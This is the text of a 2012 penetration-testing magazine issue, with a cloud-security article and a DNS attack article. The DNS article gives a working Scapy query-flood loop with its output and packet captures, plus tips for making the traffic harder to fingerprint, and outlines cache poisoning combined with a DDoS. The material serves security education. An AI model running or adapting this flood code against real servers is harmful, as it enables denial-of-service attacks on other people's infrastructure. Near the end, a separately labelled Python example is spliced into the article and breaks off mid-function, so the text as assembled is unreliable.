PenTest Magazine 05/2012 (7) · WEB APP: Bypassing web antiviruses by Eugene Dokukin aka MustLive · CLOSE-UP: Conferences in 2012 by PenTest Team


http://pentestmag.com 05/2012 (7)

CONTENTS

06 CLOUD SOLUTIONS
A walk in the clouds: Securing your Cloud Experience
by Ian Moyse
The benefits of cloud computing are resounding, but businesses are still wary of the security implications. How are you assured that your data is as safe in the cloud as it is on your own network? What are the security pros and cons of utilising the cloud? And what steps should you be taking to ensure your cloud experiences are not only beneficial to your users, but are secure for your business?

12 FOCUS
How to Successfully Attack DNS?
by Aleksandar Bratic
DNS is very attractive to attack, as IT administrators very often forget to implement measures to secure the DNS service. DNS listens on port 53, where UDP is used to resolve domain names to IP addresses and vice versa. It can also use TCP on the same port for zone transfers of full name record databases. It is estimated that 20% of total Internet traffic is DNS traffic.

18 BASICS
Web Application Vulnerability: MySQL Attack on Website Database
by Mr. Ooppss
MySQL attacks are an often used technique to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database.

22 WEB APP
Bypassing web antiviruses
by Eugene Dokukin aka MustLive
Eugene Dokukin, a pentester with 17 years of experience, tests systems that search for viruses on web sites. He gives a short brief on how easy it is to develop an effective cloaking method by integrating three elements: User-Agent, IP and DNS.

24 CLOSE-UP
Conferences in 2012
by PenTest Team
A programmer is a constantly undereducated person. Being up to date with the latest trends and solutions often decides whether you are seen as a top-shelf coder. We are presenting conferences where all the new trends are mixed and exchanged between groups and individuals in a vivid and revitalizing atmosphere, and where you can shine with your knowledge.

30 CYBER STYLETTO
Cyber crime novella: Cyber Styletto – Chapter 6
by Mike Brennan and Richard Stiennon

EDITOR'S NOTE

Hello Everyone!

Spring has finally come and let's hope that the warming will also concern the science world. I don't know if you have heard, but the library of Harvard University, the wealthiest university in the world, can't afford to buy all desirable publications. What will be its impact on global society? We don't know. But we do know that the Harvard library is spending an unimaginable $3.75M per year on these publications. Its council claims that prestigious magazine suppliers are slowing down the speed of global economic growth by winding up the prices of the newspapers, which they call 'products'.

Let's hope it will be the beginning of judging a book by its content and not its cover. In this case, PenTest Magazine will be blooming, as there are tons of information useful to everyone who just wants to make some effort and reach for it.

We open this month's edition with an article on Securing Cloud by Ian Moyse, sales director at www.workbooks.com. He writes about threats that appear during cloud computing and he proves positively that you can utilize Cloud, private and public, securely. It creates new security challenges but is still worth using. If we put its advantages and disadvantages into a reasonable mathematical equation, the first will often outnumber the last. Research shows that the most common apprehensions are data security and privacy. So how should we secure our data? After reading A Walk in the Clouds you will have a better understanding of how to prevent cloud leaks.

The next article is devoted to attacking DNS, which may be a neuralgic point since many administrators do not secure it properly. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block, as they are highly spoofable. Aleksandar Bratic describes in detail techniques of request flooding, response flooding, recursive request flooding, exploiting the DNS trust model (domain hijacking), cache poisoning and DNS hijacking.

We sacrifice some space to well-known MySQL attacks. It is so popular that we encourage you to check if you are following the countermeasures we recommend. Check if you can make safer what you consider safe now. A firewall and well-thought-out data storage might help the website. The article may be a brief review for experienced users and a brilliant lesson for beginners.

In the Close Up section we take a closer look at web antiviruses. This is a disclosure on how to successfully trick the web AV by the technique of cloaking, which has been around since the 90s. So maybe it's time to take care of it. You cannot rely only on your AV. The article is very short, but that makes it even more convincing and valid, since it is enough space to present the issue of cloaking.

And for everyone who wants to relax and have a bit of high-quality fun this summer (no matter how it sounds) we strongly recommend Cyber Styletto chapter 6, as the action enters a higher level there.

Enjoy reading!
Wojciech Chrapka & PenTest Team

TEAM

Editor: Wojciech Chrapka [email protected]
Betatesters: Ankit Prateek, Robert Keeler, Aidan Carty, Kyle Kennedy, Daniel Wood, Johan Snyman
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa [email protected]
Art Director: Ireneusz Pogroszewski [email protected]
Production Director: Andrzej Kuca [email protected]
Marketing Director: Ewa [email protected]

Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

CLOUD SOLUTIONS

A Walk in the Clouds: Securing your Cloud Experience
by Ian Moyse

The benefits of cloud computing are resounding, but businesses are still wary of the security implications. How are you assured that your data is as safe in the cloud as it is on your own network? What are the security pros and cons of utilising the cloud? And what steps should you be taking to ensure your cloud experiences are not only beneficial to your users, but are secure for your business?

What you will learn
In this article you will learn about the security areas to consider when adopting cloud solutions and some of the questions to ensure you ask.

What you should know
This article is aimed at those with a fundamental understanding of cloud and security concepts, but is written to be informative for anyone in an IT or business role who is concerned about or has read about cloud security issues.

Security is one of the most important factors for companies who want to store data and operate using the cloud, and it continues to be highlighted as the greatest concern in end user studies. Implementing and utilizing a cloud solution brings great potential benefits, but also introduces challenges around securing content and access control. The cloud offers the promise of large potential savings in infrastructure costs and improved business agility, but concerns about security are a major barrier to implementing cloud initiatives for many organizations. Before transitioning to the cloud, you need to figure out how to implement and enforce an effective security program.

Cloud security refers to the computer, network and information security of cloud computing providers and incorporates data protection, infrastructure and governance issues. Security concerns surrounding cloud computing are generally considered to be security and privacy (of the information stored), compliance (with legislation and user company policy) and legal/contractual issues. In end user survey after survey, the top two issues that surface are security (data being the typical lead in this) and reliability (being availability and accessibility). A good reference point for this is the Cloud Industry Forum's 2011 Cloud Adoption and Trends Survey, where 64% cited security as their most significant cloud concern.

Another study, carried out by network performance monitoring company Network Instruments, added confirmation that the top cloud challenge is the security of corporate data, with 45% of respondents surveyed reporting it as their key concern.

As with other major technology transitions, cloud computing has gained widespread attention and scrutiny in the media. We have seen stories abound around cloud, SaaS (Software as a Service), PaaS (Platform as a Service), etc., both in the consumer (e.g. iCloud) and business worlds. Many of the stories have scaremongered, seeing cloud as a pure risk and citing exposures such as Sony and Blackberry as examples of security and reliability in the cloud, which you could hardly fail to notice. Sony is a good case in point, where the press reported in April 2011 "Two of Sony's online gaming services were hacked, compromising confidential data of more than 100 million customers" under banner headings of it being a cloud failure! This could be better named as an internet issue. Sony wasn't delivering a service hosted on behalf of customers, more delivering a service accessed over the 'cloud', such as Instant Messenger, Amazon or any other online seller or provider of wares. The core issue was that they held customers' identities and payment details! This breach could have rung true if any online e-tailer such as eBay, PayPal, Amazon or others you may use and yourself trust had been hacked. The "Cloud's" generic branding is utilised quickly in such instances, as a useful hyped term and one that covers anything internet based. It is a wide sweeping brush that Sony became the poster child for.

The Sony leak was followed by a report by an independent security expert that found 67% of the users whose passwords were published in the Sony leak were still using the same password that was leaked a year prior in the Gawker 2010 breach. This means users who knew their password had been leaked previously, and knew they used the same password on Sony Online, had not believed there was a need, or taken the action, to change it! Users' responsibility for their part in security remains an issue whether on network or in the cloud, of course!

Sony of course started paying its toll, however, with a flow of share price drops in the weeks following the issue going public, taking it from above $30 down to $20 a share. However, today, only a year on, how many of the 24 million affected Sony users have deserted the provider? Relatively few; in the scheme of things there was moral outrage, but consumer apathy bore out and the news has passed!

As an increasing number of legacy IT vendors move to offer cloud computing as part of their portfolio, they have played down the concerns around security. However, even with industry heavyweights now committing heavily to the cloud, customers are far from blindly trusting the cloud model.

While IT teams may embrace cloud services as a way to achieve cost savings and increased business flexibility, these technologies are introducing new components and environments which change the security challenge once more. Security challenges in the cloud should be familiar to any IT manager – loss of data, threats to the infrastructure, and compliance risks, with focus varying depending on the size of organisation you represent. Cloud security is a complex topic with many considerations, ranging from protection of hardware and platform technologies in the data centre through to regulatory compliance and defending cloud access through different end-point devices.

Whether you are implementing a private or public cloud or a hybrid model that includes both, security must be a strong component of your solution.

Figure 1. Concerns about adoption of cloud


IT security in itself, cloud aside, already carries a great deal of responsibility. It must protect corporate assets from an ever increasing volume and sophistication of attacks, ensure any regulatory compliance is met, monitor and protect the business against internal threats and keep information from leaking through an ever increasing number of mediums, including email, the web and social networks. Over the past decade the IT security market has expanded rapidly as vendor solutions to thwart all the attack types have come into being, and IT security has become more complex, with a need not only to understand basic point solutions but to correlate a range of vendor offerings in a coherent manner and ensure they are also configured and updated accurately. Attackers have become more adept at penetrating systems, often still using the user as the weak link, and whereas they used to only care about high-profile or larger targets, they are now also setting their sights on smaller companies to achieve their goals.

To this end, existing on-site security solutions and infrastructure may not be sufficient or cost effective to protect against the dynamic, growing and changing attack landscape. This is not a reason alone to consider a move to the cloud, but cloud security approaches are now recognised as highly effective defence mechanisms (in reducing cost and complexity), when approached diligently.

A 2012 survey commissioned by Microsoft indicated, for example, that SMBs are gaining significant IT security advantages from cloud computing, with 35% of those surveyed experiencing "noticeably higher" levels of security since moving to the cloud and 32% spending less time each week managing security than companies not using the cloud. Security, rather than acting as a barrier to cloud adoption in smaller businesses, is in fact one of the key benefits that they can experience by moving to the cloud.

The economies of scale and flexibility the cloud brings can be both a friend and a foe from a security aspect. The concentration of data presents an attractive target to attackers, but cloud defences can be more robust, scalable and cost-effective than a self-build and manage approach! You must face the reality, though, that many employees will be using cloud services regardless of whether this is offered up by the business and IT as official policy.

How does security differ with private vs. public clouds? Businesses directly control the security of private clouds, whereas with a public cloud they rely on the standardised delivery and security of the cloud provider. Doing it yourself can give you control, but it also gives you the responsibility and overheads of delivery, updating, configuring and responding to threats. With a public cloud and a carefully chosen vendor the security of the cloud component is done for you, typically with you retaining control over access management and policies through your management portal. There are pros and cons of each approach, and do not assume vendors are all equal; doing diligence and asking pertinent questions is key. Also understand that utilising a public cloud vendor does not mitigate your security responsibilities, as there remains a need to secure your endpoints, user access and user security.

Private cloud security has similarities to security in the traditional datacentre. Worries remain around network security, authentication, auditing and identity management. However, you are no longer in complete control of the workloads, or even of the operating systems that are running in your datacentre. With private cloud, the consumers of your services can spin up new operating systems and create new applications depending on the service model you make available to your users. Therefore you need to address new areas such as the following:

• Who has the rights to access and consume your cloud services?

• Do you have controls for the behaviour of the services and operating systems that your private cloud customers will be able to run up?

• Are you able to identify self-service users that may represent potential threats, such as anyone using stolen credentials?

• Do you have mechanisms to ensure that users cannot migrate their user role into an administration role?

• Do you have a way to automate security responses to incidents, such as possible denial of service situations?

Public cloud is going to require that you do your diligence on the cloud provider: for example, asking where they host, who with, where your data is located, who has access to it, what security policies they operate, and what access you have to apply your own security policies (access control, for example). Is your data striped across multi-location datacentres? Do they apply data mingling, where your data is in the same host and database as other customers', or are you allocated a separate and discrete data store in the service?

Very few, if any, companies will move completely to the cloud in the short term; there are too many legacy systems to maintain that are cloud unfriendly.


Regulation will also play a part in areas which delay or restrict cloud being a viable solution (for now).

Cloud brings great advantage to mobile users, and with estimates from Gartner that by 2014 around 80% of professionals will use at least two personal devices to access corporate systems and data, the two are likely to become more entwined. The growth of mobile access and BYOD (Bring Your Own Device) cultures is moving the security perimeter out past the organisation's infrastructure to bold new areas. The cloud has delivered an expectation of applications that are free from the constraints of legacy desktop-tied clients and that can be accessed anywhere from pretty much any device. Cloud combined with mobile/BYOD can deliver major benefits to the productivity and flexibility of an organisation's workforce, but introduces a new range of security concerns. IDC recently stated "Mobility will present the greatest security challenge in the next five years."

Security experts have highlighted how BYOD can put an organization's network at risk, because workers could inadvertently transfer a virus-infected file into the network, or gain access and ownership over restricted organisational data by downloading it on to a device that is not owned and secured by the organisation. With cloud, of course, the user is increasingly likely to want to use a mobile device, and with a mobile device the user is likely to demand more access to cloud-like applications. The fact is that perimeterless security is harder.

Off the back of cloud and mobile devices comes authentication. How does a user authenticate securely to the cloud service (private or public)? Do they log in via a browser on the mobile device, or have a mobile client that pre-authenticates that device? If a client login, how will the user remember an ever increasing number of passwords (which in most user domains is already an issue despite the promises of Single Sign On and directory systems)? Also, cloud services, like web sites, tend to use different user ID and password formats, some being email address, some first name and surname and some employee number, with varying password lengths and rules around the characters to be utilised. All of this is a security aspect that needs to be considered. How will you secure users outside your directory and with systems accessible from any device? With cloud applications the user credentials become even more valuable, as the login is often no longer tied to a VPN connection or device, so ensuring that the user (person) side of password protection doesn't slip up is essential in the cloud world, as if it wasn't already! (sic)

Data governance and security has headline visibility whenever cloud is mentioned and is a top concern for adoption. Under new guidance from the National Institute of Standards and Technology, users and not providers have ultimate responsibility for the security and privacy of data stored on the public cloud. Guidance co-author and NIST computer scientist Tim Grance commented "accountability for security and privacy in public cloud deployments cannot be delegated to a cloud provider and remains an obligation for the organization to fulfil." This is a good thing and to be expected. Utilising cloud does not and should not totally absolve you of security responsibility for your users' behaviour.

In pursuing public cloud services, the guidelines recommend that organisations:

• Carefully plan the security and privacy aspects of cloud computing solutions before implementing them.

• Understand the public cloud computing environment offered by the cloud provider.

• Ensure that a cloud computing solution of cloud resources and cloud applications satisfies organisational security and privacy requirements.

• Maintain accountability over the privacy and security of data and applications implemented and deployed in public cloud computing environments.

A simple question that often gets asked of a cloud vendor is "where is your datacentre located?".

Figure 2. Which of these was the primary reason for adopting cloud-based services?


Advised questions would also include "and is that where my data will be held?" and "where is your backup data centre?". Further questions have arisen from recent reports highlighting that simply looking to keep data in the EU is not enough for European firms. In June 2011, the managing director of Microsoft UK admitted that it would comply with the Patriot Act, as its headquarters are based in the US, and that it would try to inform its customers of any data request as it happened, but that it would not guarantee this! This means that if you do business with a UK subsidiary of a US-based cloud operator, you can choose to specify that English law applies and ensure they offer you an EU-based data centre operating under EU data protection laws, but your data is still open to US access if your vendor is US owned. If this is of concern, you need to ensure that your provider is European owned and legislated. Of course this would exclude many mainstream providers such as Amazon, Google and Microsoft, so there are always balances and measures to apply in your decisions.

Gartner believes all cloud customers should have some basic rights to protect their interests and defined six of these as being:

• The right to retain ownership, use and control of one's own data,

• The right to SLAs that address liabilities, remediation and business outcomes,

• The right to notification and choice about changes that affect the service consumer's business processes,

• The right to understand the technical limitations or requirements of the service up front,

• The right to know what security processes the provider follows,

• The responsibility to understand and adhere to software license requirements.

In addition to security approaches, more education is also needed in cloud across all sectors to enable businesses to understand and utilize this important new technology option to its advantage in a secure manner, and this need for understanding stretches past simply the border of the IT department. CompTIA's Cloud Essentials certification is an example option that enables employees of varying roles to validate their cloud knowledge, take online training and exam-condition testing. Expect to see more cloud courses and exams providing the market with the required validations in this new cloudy world. Lack of knowledge breeds concern and risk. If you are in IT or a position of influencing your strategy, start educating now on the various forms of cloud and how to secure them in your environment. Resistance and ignorance will deliver only a short term strategy to cloud in the ever competitive business world.

Can you utilise cloud, private and public, securely? Yes. Does it pose new security challenges? Another yes. Do cloud security questions give you a reason to ignore cloud and maintain the status quo of on-network deployments? In places, of course, you will decide that a specific application or requirement is best served on network, but it is not an all-encompassing no, for sure! Cloud offers a lot of benefits, varying by organisation and application, and the security aspects can be overcome as others have been in the past. Educate, learn, adapt and adopt, as cloud is here to stay in its varying form factors; there are too many success stories and businesses doing well utilizing cloud for security to be a pure play excuse any longer.

Worth seeing
Those wishing to learn more and participate in the cloud can also find some great vendor independent resources such as:

• http://www.cloudindustryforum.org/
• https://cloudsecurityalliance.org/
• http://www.eurocloud.org/

IAN MOYSE
Ian Moyse has over 25 years of experience in the IT sector, with nine of these specialising in security. For the last 8 years he has been focused on cloud computing and has become a thought leader in this arena. He now holds the role of Sales Director at Cloud CRM provider Workbooks.com. He also sits on the board of Eurocloud UK and the Governance Board of the Cloud Industry Forum (CIF), and in early 2012 was appointed to the advisory board of SaaSMax. He was named by TalkinCloud as one of the global top 200 cloud channel experts in 2011, and in early 2012 Ian was the first in the UK to pass the CompTIA Cloud Essentials specialty certification exam. Sales Director www.workbooks.com, Eurocloud UK Board Member & Cloud Industry Forum Governance Board Member.


FOCUS

Page 12 http://pentestmag.com05/2012(7) Page 13 http://pentestmag.com05/2012(7)

DNS was proposed by Paul Mockapetris in 1983 (in RFC’s 882 and 883), as a distributed and dynamic database – as opposed to the single

table on a single host that was used by the earlier version of the internet, ARPAnet. Together with Jon Postel, he is considered the inventor of DNS.

Structure of a DNS packet

ID – A 16-bit identifier assigned by the program that generates any kind of query. This identifier is copied into the corresponding reply and can be used by the requester to match replies to outstanding queries.

QR – A one-bit field that specifies whether this message is a query (0) or a response (1).

OPCODE – A four-bit field that specifies the kind of query in this message.

AA (Authoritative Answer) – this bit is only meaningful in responses and specifies that the responding name server is an authority for the domain name in question, i.e. it reports whether the response you receive is authoritative.

TC (TrunCation) – specifies that this message was truncated.

RD (Recursion Desired) – this bit directs the name server to pursue the query recursively. Set it to 1 to request recursion.

RA (Recursion Available) – this bit is set or cleared in a response and denotes whether recursive query support is available in the name server. Recursive query support is optional.

Z – Reserved for future use.

RCODE (Response code) – this 4-bit field is set as part of responses. The values have the following interpretation:

0 – No error condition.
1 – Format error – The name server was unable to interpret the query.
2 – Server failure – The name server was unable to process this query due to a problem with the name server.
3 – Name Error – Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist.
4 – Not Implemented – The name server does not support the requested kind of query.
5 – Refused – The name server refuses to perform the specified operation for policy reasons.

QDCOUNT – an unsigned 16-bit integer specifying the number of entries in the question section. In a query this is set to 1, indicating one question.

ANCOUNT – an unsigned 16-bit integer specifying the number of resource records in the answer section. In a query this is set to 0, since the query carries no answers.

NSCOUNT – an unsigned 16-bit integer specifying the number of name server resource records in the authority records section.

ARCOUNT – an unsigned 16-bit integer specifying the number of resource records in the additional records section.

How to Successfully Attack DNS?

DNS is a very attractive target because IT administrators very often forget to implement measures to secure the DNS service. DNS listens on port 53: UDP is used to resolve domain names to IP addresses and vice versa, and TCP on the same port is used for zone transfers of full name record databases. It has been estimated that about 20% of total Internet traffic is DNS traffic.

Figure 1. Domain name system

DNS Request Flooding

As mentioned above, DNS uses UDP for name resolution queries. Because UDP is connectionless, the source address of a query is trivially spoofable, which makes a DNS denial-of-service attack very difficult to trace and block. A DNS flood works by sending a large number of DNS requests in rapid succession, hitting the server with more traffic than it can handle so that its performance for legitimate requests drops.

Scapy is a packet manipulation program that can forge requests and send them to a specified host. Below I show how it can be used in a DNS flooding attack (Listing 1 and Listing 2). Three details of the captures are worth noting before reusing the script: Scapy leaves the DNS transaction ID at its default of 0 (the id=0 in every reply), which makes the traffic easy to fingerprint; every reply is met with an ICMP port unreachable from the sending host, because no socket is bound to the random source port chosen by RandShort(); and the PTR queries for both hosts' addresses are tcpdump resolving names for its own output, so run it with -n to keep them out of the capture.

Listing 1. Output

Welcome to Scapy (2.2.0)
>>> top_level = ".rs"
>>> domain = "example"
>>> cnt = 1000
>>> dns_server = "10.123.11.2"
>>>
>>> for i in range(0, cnt):
...     s = RandString(RandNum(1,8))      # random label of 1 to 8 characters
...     s1 = s.lower()
...     q = s1 + "." + domain + top_level  # <label>.example.rs, never cached
...     print i, q
...     sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS(rd=1, qd=DNSQR(qname=q)))
...
0 2dat.example.rs
Begin emission:
.Finished to send 1 packets.
..*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=114 id=27935 flags=DF frag=0L ttl=126 proto=udp chksum=0x59ed src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=10385 len=94 chksum=0x21ac |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='2dat.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x19\nhostmaster\xc0/w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\x00*0' |> ar=None |>>>
1 e0qysndm.example.rs
Begin emission:
Finished to send 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=118 id=27937 flags=DF frag=0L ttl=126 proto=udp chksum=0x59e7 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=42090 len=98 chksum=0xecab |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='e0qysndm.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x1d\nhostmaster\xc03w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\x00*0' |> ar=None |>>>
2 ponlj.example.rs
Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=115 id=27939 flags=DF frag=0L ttl=126 proto=udp chksum=0x59e8 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=3015 len=95 chksum=0x21d4 |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='ponlj.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900
3 xx.example.rs
Begin emission:
Finished to send 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=112 id=27941 flags=DF frag=0L ttl=126 proto=udp chksum=0x59e9 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=56637 len=92 chksum=0xd320 |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='xx.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x17\nhostmaster\xc0-w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\x00*0' |> ar=None |>>>
4 6348lzwk.example.rs
Begin emission:
Finished to send 1 packets.

DNS Response Flooding

In this attack a client or name server floods a name server with requests for records for which the server is authoritative, using a spoofed source IP address. The result is that the target network, the one associated with the spoofed address, is flooded with DNS responses to requests it never issued (Figure 2).

Listing 2. Tcpdump output

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
15:33:50.292083 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 61)
    ws003.local.10385 > dns.company.com.domain: [udp sum ok] 0+ A? 2dat.example.rs. (33)
15:33:50.292865 IP (tos 0x0, ttl 64, id 41127, offset 0, flags [DF], proto UDP (17), length 70)
    ws003.local.37817 > dns.company.com.domain: [udp sum ok] 10990+ PTR? 2.11.123.10.in-addr.arpa. (42)
15:33:50.293051 IP (tos 0x0, ttl 126, id 27933, offset 0, flags [DF], proto UDP (17), length 102)
    dns.company.com.domain > ws003.local.37817: [udp sum ok] 10990* q: PTR? 2.11.123.10.in-addr.arpa. 1/0/0 2.11.123.10.in-addr.arpa. PTR dns.company.com. (74)
15:33:50.293235 IP (tos 0x0, ttl 64, id 41127, offset 0, flags [DF], proto UDP (17), length 72)
    ws003.local.54183 > dns.company.com.domain: [udp sum ok] 35417+ PTR? 119.21.123.10.in-addr.arpa. (44)
15:33:50.293629 IP (tos 0x0, ttl 126, id 27934, offset 0, flags [DF], proto UDP (17), length 159)
    dns.company.com.domain > ws003.local.54183: [udp sum ok] 35417 NXDomain* q: PTR? 119.21.123.10.in-addr.arpa. 0/1/0 ns: 21.123.10.in-addr.arpa. SOA dns.company.com. hostmaster.alcoyu.co.yu. 3325 900 600 86400 3600 (131)
15:33:50.296174 IP (tos 0x0, ttl 126, id 27935, offset 0, flags [DF], proto UDP (17), length 114)
    dns.company.com.domain > ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (86)
15:33:50.296217 IP (tos 0xc0, ttl 64, id 17068, offset 0, flags [none], proto ICMP (1), length 142)
    ws003.local > dns.company.com: ICMP ws003.local udp port 10385 unreachable, length 122
    IP (tos 0x0, ttl 126, id 27935, offset 0, flags [DF], proto UDP (17), length 114)
    dns.company.com.domain > ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (86)
15:33:50.339515 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 65)
    ws003.local.42090 > dns.company.com.domain: [udp sum ok] 0+ A? e0qysndm.example.rs. (37)
15:33:50.343398 IP (tos 0x0, ttl 126, id 27937, offset 0, flags [DF], proto UDP (17), length 118)
    dns.company.com.domain > ws003.local.42090: [udp sum ok] 0 NXDomain q: A? e0qysndm.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (90)


Recursive Request Flooding

In this attack the attacker floods a target name server with DNS requests for records for which the server is not authoritative. This has two effects: the target name server is flooded with recursive DNS requests, and the authoritative name server responsible for the requested records is hit with the resulting request flood.

Exploiting the DNS Trust Model – Domain Hijacking

This form of attack could also be called a DNS registration attack. To take ownership of a domain it is necessary to register it at the appropriate Internet registrar, provide the domain contact information, and ensure that the generic top-level domain (gTLD) servers are updated with the appropriate name server information. It is possible to fake the DNS registration or to change the registration details. If the attack succeeds and the DNS registration records are updated, the attacker can set up a "rogue" DNS server and direct clients to fake web sites and mail servers. This attack is preferred by phishers because the user is unaware of the fraud.

DNS registration bodies have introduced several protective controls to authenticate registration requests and so avoid domain hijacking:

• Comparison of the e-mail address in the mail header with the Mail-From field of the message.
• A contact-supplied password, stored encrypted in the database, used to authenticate registration requests.
• The use of PGP keys for signing registration modification requests.

Cache Poisoning

Very often DNS servers are configured to look for records in their cache first and only then in zone file data. From an attacker's perspective it is easier to poison the cache of a name server than to manipulate its zones.

A cache poisoning attack can be combined with a DNS spoofing attack. By spoofing a counterfeit response to a DNS query, an attacker can remotely update the server's cache data. When a high TTL (Time To Live) value is returned by the attacker along with the spoofed record data, the response data will be cached by the local name server for a considerable period of time, and this affects all clients on the same network. The goal of a cache poisoning attack is to feed the name server false address (A) or name server (NS) records with a high TTL value, in order to redirect clients and servers or to cause a denial of service.

Figure 2. DNS Response flooding

Figure 3. DNS Cache poisoning

What makes DNS cache poisoning a difficult (or easy) exploit is the 16-bit Transaction ID, an integer sent with every DNS query and copied into the reply. This integer is supposed to be randomly generated. Note that even a perfectly random ID gives only 65,536 possibilities, which is why resolvers also randomize the UDP source port of each outgoing query, so that an attacker has to guess both values.

In the diagram below the attacker tries to poison the cache of the company DNS server for the domain answer.com and place a fake IP address in its cache.

In the first step of the attack, the attacker asks the company's DNS server for the domain name answer.com with the command:

root@bt# dig answer.com @company.com

If there was no recent request for answer.com at the company's DNS server, it will query the root name servers and follow the referrals down to the authoritative server to look up the IP address for answer.com. This query contains the random Transaction ID. At the same time, the attacker floods the company's DNS server with manually crafted packets that look like the expected DNS reply but contain the wrong IP address. Each reply carries a different Transaction ID; the attacker expects that one of these fake replies will match the Transaction ID in the query sent by the company's DNS server.

It is important that the attacker's replies reach the company's DNS server before the legitimate reply. If the Transaction IDs used by the company's DNS server are predictable, the attacker has a much better chance of planting the desired IP address. The company's DNS server will accept the first reply that appears legitimate, i.e. the first one whose Transaction ID matches.

What can make this attack even more efficient is to start a DDoS against the authoritative DNS server for www.answer.com: delaying the legitimate reply widens the window in which the attacker's guessed replies can arrive first (Figure 3).
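The following Python is an added example, not code from the article. It packs and parses the header fields listed under "Structure of a DNS packet" and then replays the Transaction ID race described in this section against a toy resolver, once with sequential IDs and once with properly random 16-bit IDs. The Resolver class, the names answer.com and attacker.example, and the address 203.0.113.66 are assumptions made for the example; nothing here touches the network.

```python
"""Added example (not the article's code): RFC 1035 header packing/parsing and a
toy resolver used to show why a guessable 16-bit transaction ID makes cache
poisoning cheap. The Resolver, the names and 203.0.113.66 are assumptions."""
import random
import struct

HEADER = struct.Struct("!HHHHHH")  # ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
RCODES = {0: "no-error", 1: "format-error", 2: "server-failure",
          3: "name-error", 4: "not-implemented", 5: "refused"}


def build_header(txid, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, rcode=0,
                 qdcount=1, ancount=0, nscount=0, arcount=0):
    """12-byte header; the flag word is QR(1) OPCODE(4) AA TC RD RA Z(3) RCODE(4)."""
    flags = ((qr << 15) | (opcode << 11) | (aa << 10) | (tc << 9)
             | (rd << 8) | (ra << 7) | (rcode & 0xF))
    return HEADER.pack(txid, flags, qdcount, ancount, nscount, arcount)


def parse_header(data):
    """Inverse of build_header, with RCODE translated to the names used in the text."""
    txid, flags, qd, an, ns, ar = HEADER.unpack_from(data, 0)
    return {"id": txid, "qr": (flags >> 15) & 1, "opcode": (flags >> 11) & 0xF,
            "aa": (flags >> 10) & 1, "tc": (flags >> 9) & 1, "rd": (flags >> 8) & 1,
            "ra": (flags >> 7) & 1, "z": (flags >> 4) & 7,
            "rcode": RCODES.get(flags & 0xF, flags & 0xF),
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def encode_qname(name):
    """'www.answer.com' -> length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_qname(data, off):
    labels = []
    while data[off]:
        labels.append(data[off + 1:off + 1 + data[off]].decode("ascii"))
        off += 1 + data[off]
    return ".".join(labels), off + 1


def build_query(txid, name):
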